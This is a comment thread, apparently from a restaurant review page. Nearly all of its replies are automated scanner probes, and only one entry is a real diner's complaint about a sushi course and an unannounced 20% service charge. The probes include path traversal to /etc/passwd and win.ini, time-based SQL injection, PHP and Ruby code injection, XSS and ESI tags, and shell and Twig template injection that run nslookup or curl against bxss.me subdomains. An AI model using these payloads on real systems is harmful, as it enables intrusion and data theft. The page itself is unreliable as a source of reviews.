/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
c:/windows/win.ini
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
file:///etc/passwd
re: JJ
bxss.me
re: JJ
bxss.me/t/xss.html?%00
re: JJ
"+"A".concat(70-3).concat(22*4).concat(107).concat(65).concat(102).concat(89)+(require"socket"
Socket.gethostbyname("hitms"+"ysasoxnz3267a.bxss.me.")[3].to_s)+"
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
/WEB-INF/web.xml
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(113).concat(89).concat(119).concat(75)+(require'socket'
Socket.gethostbyname('hitoc'+'pvmeapnk8a21e.bxss.me.')[3].to_s)+'
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
';print(md5(31337));$a='
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
";print(md5(31337));$a="
re: JJ
'"
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
${@print(md5(31337))}
re: JJ
<!--
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
${@print(md5(31337))}\
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
'.print(md5(31337)).'
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+80-80-1=0+0+0+1 --
re: JJ
-1 OR 3+80-80-1=0+0+0+1 --
re: JJ
-1 OR 2+850-850-1=0+0+0+1
re: JJ
-1 OR 3+850-850-1=0+0+0+1
re: JJ
-1' OR 2+333-333-1=0+0+0+1 --
re: JJ
-1' OR 3+333-333-1=0+0+0+1 --
re: JJ
-1' OR 2+641-641-1=0+0+0+1 or 'hGRp3T3S'='
re: JJ
-1' OR 3+641-641-1=0+0+0+1 or 'hGRp3T3S'='
re: JJ
-1" OR 2+588-588-1=0+0+0+1 --
re: JJ
-1" OR 3+588-588-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
1hcUtC0I'; waitfor delay '0:0:15' --
re: JJ
-5 OR 20=(SELECT 20 FROM PG_SLEEP(15))--
re: JJ
-5) OR 749=(SELECT 749 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: JJ
Rv28cT5a' OR 817=(SELECT 817 FROM PG_SLEEP(15))--
re: JJ
42KVuh38') OR 815=(SELECT 815 FROM PG_SLEEP(15))--
re: JJ
tmgVGFZn')) OR 375=(SELECT 375 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@3LemV
re: JJ
14TY5QZVP0
re: JJ
response.write(9293755*9424036)
re: JJ
'+response.write(9293755*9424036)+'
re: JJ
"+response.write(9293755*9424036)+"
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
${9999152+9999709}
re: JJ
file:///etc/passwd
re: JJ
../
re: JJ
)
re: JJ
!(()&&!|*|*|
re: JJ
^(#$!@#$)(()))******
re: JJ
redirtest.acx
re: JJ
ctime
sleep
p0
(I30
tp1
Rp2
.
re: JJ
echo oafqsu$()\ hruvwg\nz^xyu||a #' &echo oafqsu$()\ hruvwg\nz^xyu||a #|" &echo oafqsu$()\ hruvwg\nz^xyu||a #
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: JJ
&echo yypork$()\ vqbubs\nz^xyu||a #' &echo yypork$()\ vqbubs\nz^xyu||a #|" &echo yypork$()\ vqbubs\nz^xyu||a #
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: JJ
'.gethostbyname(lc('hitzv'.'vdiltssecb5de.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(89).chr(109).chr(82).'
re: JJ
|echo guthqt$()\ gxmmir\nz^xyu||a #' |echo guthqt$()\ gxmmir\nz^xyu||a #|" |echo guthqt$()\ gxmmir\nz^xyu||a #
re: JJ
/etc/shells
re: JJ
".gethostbyname(lc("hited"."pputvwux200de.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(83).chr(98).chr(66)."
re: JJ
expr 9000347220 - 910914
re: JJ
../../../../../../../../../../../../../../etc/shells
re: JJ
gethostbyname(lc('hitky'.'xflkniyrb102a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(65).chr(98).chr(70)
re: JJ
(nslookup -q=cname hitsqoaykqjyna149e.bxss.me||curl hitsqoaykqjyna149e.bxss.me))
re: JJ
c:/windows/win.ini
re: JJ
$(nslookup -q=cname hitdscyzzaxnxe6edc.bxss.me||curl hitdscyzzaxnxe6edc.bxss.me)
re: JJ
bxss.me
re: JJ
&nslookup -q=cname hitnmyvilppbv0dfc9.bxss.me&'\"`0&nslookup -q=cname hitnmyvilppbv0dfc9.bxss.me&`'
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
&(nslookup -q=cname hitlmdhepnyqy87b69.bxss.me||curl hitlmdhepnyqy87b69.bxss.me)&'\"`0&(nslookup -q=cname hitlmdhepnyqy87b69.bxss.me||curl hitlmdhepnyqy87b69.bxss.me)&`'
re: JJ
http://bxss.me/t/fit.txt?.jpg
re: JJ
|(nslookup -q=cname hitmayqmxuopod5187.bxss.me||curl hitmayqmxuopod5187.bxss.me)
re: JJ
`(nslookup -q=cname hitceokryypoa8ab92.bxss.me||curl hitceokryypoa8ab92.bxss.me)`
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
;(nslookup -q=cname hittjpnmcjpxx4da46.bxss.me||curl hittjpnmcjpxx4da46.bxss.me)|(nslookup -q=cname hittjpnmcjpxx4da46.bxss.me||curl hittjpnmcjpxx4da46.bxss.me)&(nslookup -q=cname hittjpnmcjpxx4da46.bxss.me||curl hittjpnmcjpxx4da46.bxss.me)
re: JJ
';print(md5(31337));$a='
re: JJ
|(nslookup${IFS}-q${IFS}cname${IFS}hitvknavkacls7b89c.bxss.me||curl${IFS}hitvknavkacls7b89c.bxss.me)
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
";print(md5(31337));$a="
re: JJ
&(nslookup${IFS}-q${IFS}cname${IFS}hitrjfgmeybxo808f2.bxss.me||curl${IFS}hitrjfgmeybxo808f2.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrjfgmeybxo808f2.bxss.me||curl${IFS}hitrjfgmeybxo808f2.bxss.me)&`'
re: JJ
bxss.me/t/xss.html?%00
re: JJ
${@print(md5(31337))}
re: JJ
${@print(md5(31337))}\
re: JJ
"+"A".concat(70-3).concat(22*4).concat(108).concat(73).concat(115).concat(76)+(require"socket"
Socket.gethostbyname("hitqv"+"wynuztzobe53f.bxss.me.")[3].to_s)+"
re: JJ
'.print(md5(31337)).'
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(100).concat(81).concat(106).concat(72)+(require'socket'
Socket.gethostbyname('hitzy'+'bcicjqdb6114c.bxss.me.')[3].to_s)+'
re: JJ
'A'.concat(70-3).concat(22*4).concat(120).concat(82).concat(99).concat(70)+(require'socket'
Socket.gethostbyname('hityx'+'qbyyhwau150f3.bxss.me.')[3].to_s)
re: JJ
'"()
re: JJ
'&&sleep(27*1000)*oannkk&&'
re: JJ
"&&sleep(27*1000)*dppqqd&&"
re: JJ
'"
re: JJ
'||sleep(27*1000)*rwlboq||'
re: JJ
replies
re: JJ
<!--
re: JJ
"||sleep(27*1000)*erlwse||"
re: JJ
replies
re: JJ
replies/.
re: JJ
'"()&%<zzz><ScRiPt >dCAG(9672)</ScRiPt>
re: JJ
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitclnlknyfmq5c157.bxss.me")}}
re: JJ
'"()&%<zzz><ScRiPt >dCAG(9821)</ScRiPt>
re: JJ
9220983
re: JJ
n6dfXtc1
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
-1 OR 5*5=25 --
re: JJ
-1 OR 5*5=26 --
re: JJ
-1 OR 5*5=25
re: JJ
-1 OR 5*5=26
re: JJ
*if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
-1 waitfor delay '0:0:15' --
re: JJ
WvVVRT3n'; waitfor delay '0:0:15' --
re: JJ
-1 OR 910=(SELECT 910 FROM PG_SLEEP(15))--
re: JJ
-1) OR 317=(SELECT 317 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 546=(SELECT 546 FROM PG_SLEEP(15))--
re: JJ
In0lyCtQ' OR 150=(SELECT 150 FROM PG_SLEEP(15))--
re: JJ
f0Uddf65') OR 37=(SELECT 37 FROM PG_SLEEP(15))--
re: JJ
fylI4bLu')) OR 71=(SELECT 71 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
'"
re: JJ
@@bTFUk
re: JJ
(select 198766*667891)
re: JJ
(select 198766*667891 from DUAL)
Booked a reservation for party of 2 and visited and felt very disappointed. We were served only nigiri and no appetizers. The chef told us the name of the fish on each nigiri and that was it. No other conversation throughout the dinner. He was only talking to his regular customers. And at then end we were charge 20% of service charge on top of the course price and they didn't specify this charge at the time of booking! NOT worth a visit!!
re: guest
1KYCYD8R20
re: guest
response.write(9555696*9748465)
re: guest
'+response.write(9555696*9748465)+'
re: guest
"+response.write(9555696*9748465)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999106+9999185}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'.gethostbyname(lc('hitaj'.'wungonof58082.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(71).chr(111).chr(65).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: guest
".gethostbyname(lc("hitug"."nxlqrjhhc7e0f.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(65).chr(110).chr(71)."
re: guest
echo rulzty$()\ tyider\nz^xyu||a #' &echo rulzty$()\ tyider\nz^xyu||a #|" &echo rulzty$()\ tyider\nz^xyu||a #
re: guest
/etc/shells
re: guest
gethostbyname(lc('hitva'.'crgjvtvx4ace0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(76).chr(109).chr(87)
re: guest
&echo wzmhlb$()\ nvmkez\nz^xyu||a #' &echo wzmhlb$()\ nvmkez\nz^xyu||a #|" &echo wzmhlb$()\ nvmkez\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
|echo ijqdig$()\ bcwnxh\nz^xyu||a #' |echo ijqdig$()\ bcwnxh\nz^xyu||a #|" |echo ijqdig$()\ bcwnxh\nz^xyu||a #
re: guest
c:/windows/win.ini
re: guest
expr 9000557097 - 952664
re: guest
bxss.me
re: guest
(nslookup -q=cname hityqjyxdvnvhaadbf.bxss.me||curl hityqjyxdvnvhaadbf.bxss.me))
re: guest
Http://bxss.me/t/fit.txt
re: guest
$(nslookup -q=cname hitgnrexblmyf8a3a0.bxss.me||curl hitgnrexblmyf8a3a0.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&nslookup -q=cname hitfwtdsaexxmc438f.bxss.me&'\"`0&nslookup -q=cname hitfwtdsaexxmc438f.bxss.me&`'
re: guest
&(nslookup -q=cname hitovfffsspot2ac64.bxss.me||curl hitovfffsspot2ac64.bxss.me)&'\"`0&(nslookup -q=cname hitovfffsspot2ac64.bxss.me||curl hitovfffsspot2ac64.bxss.me)&`'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
|(nslookup -q=cname hitiflcohztvs795fd.bxss.me||curl hitiflcohztvs795fd.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
bxss.me/t/xss.html?%00
re: guest
`(nslookup -q=cname hitjfxxpgdbkxedaf0.bxss.me||curl hitjfxxpgdbkxedaf0.bxss.me)`
re: guest
";print(md5(31337));$a="
re: guest
;(nslookup -q=cname hitlkavkuxstld5354.bxss.me||curl hitlkavkuxstld5354.bxss.me)|(nslookup -q=cname hitlkavkuxstld5354.bxss.me||curl hitlkavkuxstld5354.bxss.me)&(nslookup -q=cname hitlkavkuxstld5354.bxss.me||curl hitlkavkuxstld5354.bxss.me)
re: guest
"+"A".concat(70-3).concat(22*4).concat(120).concat(78).concat(103).concat(89)+(require"socket"
Socket.gethostbyname("hitjh"+"cftldiwr5e578.bxss.me.")[3].to_s)+"
re: guest
${@print(md5(31337))}
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitxoehivgzrkbe0d9.bxss.me||curl${IFS}hitxoehivgzrkbe0d9.bxss.me)
re: guest
'+'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(119).concat(87)+(require'socket'
Socket.gethostbyname('hitpx'+'qzhbeyjv83a5d.bxss.me.')[3].to_s)+'
re: guest
${@print(md5(31337))}\
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitgymvagpwsf2973d.bxss.me||curl${IFS}hitgymvagpwsf2973d.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitgymvagpwsf2973d.bxss.me||curl${IFS}hitgymvagpwsf2973d.bxss.me)&`'
re: guest
'A'.concat(70-3).concat(22*4).concat(106).concat(77).concat(115).concat(85)+(require'socket'
Socket.gethostbyname('hitwf'+'zabukqooe9b34.bxss.me.')[3].to_s)
re: guest
'.print(md5(31337)).'
re: guest
'"()
re: guest
'&&sleep(27*1000)*aleyuh&&'
re: guest
"&&sleep(27*1000)*eejahg&&"
re: guest
replies
re: guest
'||sleep(27*1000)*mfmzwl||'
re: guest
'"
re: guest
replies
re: guest
<!--
re: guest
"||sleep(27*1000)*zsgxlc||"
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >wsBy(9749)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitsxfecdblek6b7b1.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >wsBy(9470)</ScRiPt>
re: guest
9801292
re: guest
9QKAKaY3
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
CtEmA225'; waitfor delay '0:0:15' --
re: guest
-1 OR 51=(SELECT 51 FROM PG_SLEEP(15))--
re: guest
-1) OR 966=(SELECT 966 FROM PG_SLEEP(15))--
re: guest
-1)) OR 822=(SELECT 822 FROM PG_SLEEP(15))--
re: guest
ruoh3BOA' OR 185=(SELECT 185 FROM PG_SLEEP(15))--
re: guest
7ZapJ0fY') OR 682=(SELECT 682 FROM PG_SLEEP(15))--
re: guest
DgGkXrFA')) OR 318=(SELECT 318 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@u8186
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)